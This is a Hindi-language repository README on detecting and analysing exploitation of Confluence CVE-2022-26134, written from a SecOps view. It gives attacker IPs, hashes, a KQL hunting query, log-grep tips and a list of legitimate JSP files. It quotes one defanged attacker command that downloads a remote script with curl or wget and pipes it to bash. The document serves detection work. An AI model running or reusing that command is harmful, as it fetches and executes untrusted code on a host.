
यह रिपॉजिटरी Atlassian Confluence के Zero-Day Exploitation के बारे में है, और यह SecOps या Blue Team के परिप्रेक्ष्य से इसके बचाव और विश्लेषण का दृष्टिकोण प्रस्तुत करती है।
यह रिपॉज़िटरी Atlassian Confluence के ज़ीरो-डे शोषण, इसकी सुरक्षा और एक SecOps या ब्लू टीम के दृष्टिकोण से विश्लेषण के बारे में बात करती है।
संयुक्त राज्य अमेरिका में मेमोरियल डे सप्ताहांत के दौरान, Volexity ने अपने एक ग्राहक के दो इंटरनेट-फ़ेसिंग वेब सर्वरों से जुड़ी एक घटना प्रतिक्रिया जांच की, जो Atlassian Confluence Server सॉफ़्टवेयर चला रहे थे। जांच तब शुरू हुई जब होस्टों पर संदिग्ध गतिविधि का पता चला, जिसमें डिस्क पर JSP वेबशेल लिखे जाना शामिल था। Volexity ने तुरंत Volexity Surge Collect Pro का उपयोग करके Confluence Server सिस्टमों से सिस्टम मेमोरी और प्रमुख फ़ाइलें एकत्र कीं और उनका विश्लेषण किया। एकत्रित डेटा की गहन समीक्षा के बाद, Volexity यह निर्धारित करने में सक्षम था कि सर्वर से समझौता एक हमलावर द्वारा एक एक्सप्लॉइट लॉन्च करने के परिणामस्वरूप हुआ था, जिससे रिमोट कोड निष्पादन प्राप्त हुआ। बाद में Volexity उस एक्सप्लॉइट को पुनः बनाने और Confluence Server के पूरी तरह से अपडेटेड संस्करणों को प्रभावित करने वाली एक ज़ीरो-डे भेद्यता की पहचान करने में सक्षम था।
इस भेद्यता की खोज और सत्यापन के बाद, Volexity ने 31 मई, 2022 को प्रासंगिक विवरण रिपोर्ट करने के लिए Atlassian से संपर्क किया। Atlassian ने तब से भेद्यता की पुष्टि की है और बाद में इस मुद्दे को CVE-2022-26134 सौंपा है। यह Confluence Server और Data Center के वर्तमान संस्करणों पर काम करने की पुष्टि की गई है।
तकनीकी विवरण यहाँ देखें
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
(install directory)/logs/*.log में स्ट्रिंग ${ की तलाश करेंegrep -a -i -f pattern.txt *.log का प्रयास करें जहां pattern.txt को ${ के रूप में सहेजा जाना चाहिए या बस grep "\${" log file path या grep "$%7B" log file path का प्रयास करेंfindstr -i noop.jsp "logpath" का प्रयास कर सकते हैंconfluence_install_dir/work/Standalone/ निर्देशिका में $jspname_jsp.java खोजने का प्रयास करें। उदाहरण के लिए, यदि आपको hack.jsp नाम का एक शेल मिलता है, तो आपको hack_jsp.java देखना चाहिए। यदि आपको hack.jsp डिस्क पर नहीं मिलता है, तो वेब लॉग में इसके एक्सेस की तलाश करें। इससे पता चलेगा कि इसे कब एक्सेस/डिलीट किया गया था।process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' David द्वारा यहाँ वर्णित के रूप में पहचानने में मदद कर सकती हैbash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash की तलाश करें./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp
इसलिए ऊपर सूचीबद्ध नहीं की गई नई बनाई गई फ़ाइलों की तलाश करें
./confluence/org/apache/jsp/ निर्देशिका में उन .java फ़ाइलों की तलाश करें जो वहां नहीं होनी चाहिए।java->bash->python->bash